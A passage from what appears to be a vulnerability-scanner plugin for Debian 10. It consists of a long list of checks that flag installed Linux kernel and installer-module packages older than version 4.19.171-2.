reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"crypto-modules-4.19.0-5-s390x-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"dasd-extra-modules-4.19.0-5-s390x-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"dasd-modules-4.19.0-5-s390x-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"efi-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"event-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"event-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"event-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"event-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"event-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"event-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"event-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ext4-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ext4-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ext4-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ext4-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ext4-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ext4-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ext4-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ext4-modules-4.19.0-5-s390x-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"fancontrol-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"fat-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"fat-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"fat-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"fat-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"fat-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"fat-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"fat-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"fat-modules-4.19.0-5-s390x-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"fb-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"fb-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"fb-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"fb-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"fb-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"fb-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"firewire-core-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"firewire-core-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"fuse-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"fuse-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"fuse-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"fuse-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"fuse-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"fuse-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"fuse-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"fuse-modules-4.19.0-5-s390x-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"hfs-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"hfs-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"hfs-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"hfs-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"hyperv-daemons\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"hypervisor-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"i2c-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"i2c-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"i2c-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"i2c-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"input-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"input-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"input-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"input-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"input-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"input-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"input-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ipv6-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"isofs-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"isofs-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"isofs-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"isofs-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"isofs-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"isofs-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"isofs-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"isofs-modules-4.19.0-5-s390x-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"jffs2-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"jfs-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"jfs-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"jfs-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"jfs-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"jfs-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"jfs-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"jfs-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"kernel-image-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"kernel-image-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"kernel-image-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"kernel-image-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"kernel-image-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"kernel-image-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"kernel-image-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"kernel-image-4.19.0-5-s390x-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"leds-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"leds-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libbpf-dev\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libbpf4.19\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libcpupower-dev\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libcpupower1\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"liblockdep-dev\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"liblockdep4.19\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-compiler-gcc-8-arm\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-compiler-gcc-8-s390\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-compiler-gcc-8-x86\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-config-4.19\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-cpupower\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-doc-4.19\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-4kc-malta\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-5kc-malta\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-686\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-686-pae\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-all\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-all-amd64\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-all-arm64\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-all-armel\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-all-armhf\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-all-i386\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-all-mips\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-all-mips64el\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-all-mipsel\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-all-ppc64el\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-all-s390x\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-amd64\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-arm64\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-armmp\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-armmp-lpae\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-cloud-amd64\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-common\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-common-rt\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-loongson-3\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-marvell\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-octeon\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-powerpc64le\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-rpi\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-rt-686-pae\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-rt-amd64\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-rt-arm64\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-rt-armmp\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-headers-4.19.0-5-s390x\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-4kc-malta\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-4kc-malta-dbg\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-5kc-malta\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-5kc-malta-dbg\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-686-dbg\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-686-pae-dbg\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-686-pae-unsigned\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-686-unsigned\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-amd64-dbg\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-amd64-unsigned\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-arm64-dbg\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-arm64-unsigned\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-armmp\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-armmp-dbg\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-armmp-lpae\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-armmp-lpae-dbg\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-cloud-amd64-dbg\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-cloud-amd64-unsigned\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-loongson-3\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-loongson-3-dbg\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-marvell\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-marvell-dbg\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-octeon\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-octeon-dbg\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-powerpc64le\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-powerpc64le-dbg\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-rpi\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-rpi-dbg\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-rt-686-pae-dbg\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-rt-686-pae-unsigned\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-rt-amd64-dbg\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-rt-amd64-unsigned\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-rt-arm64-dbg\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-rt-arm64-unsigned\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-rt-armmp\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-rt-armmp-dbg\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-s390x\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-4.19.0-5-s390x-dbg\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-amd64-signed-template\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-arm64-signed-template\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-image-i386-signed-template\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-kbuild-4.19\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-libc-dev\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-perf-4.19\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-source-4.19\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"linux-support-4.19.0-5\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"lockdep\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"loop-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"loop-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"loop-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"loop-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"loop-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"loop-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"loop-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"loop-modules-4.19.0-5-s390x-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"md-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"md-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"md-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"md-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"md-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"md-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"md-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"md-modules-4.19.0-5-s390x-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"minix-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"minix-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"minix-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"minix-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"minix-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"mmc-core-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"mmc-core-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"mmc-core-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"mmc-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"mmc-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"mmc-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"mmc-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"mouse-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"mouse-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"mouse-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"mouse-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"mtd-core-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"mtd-core-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"mtd-core-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"mtd-core-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"mtd-core-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"mtd-core-modules-4.19.0-5-s390x-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"mtd-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"mtd-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"multipath-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"multipath-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"multipath-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"multipath-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"multipath-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"multipath-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"multipath-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"multipath-modules-4.19.0-5-s390x-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nbd-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nbd-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nbd-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nbd-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nbd-modules-4.19.0-5-marvell-di\", 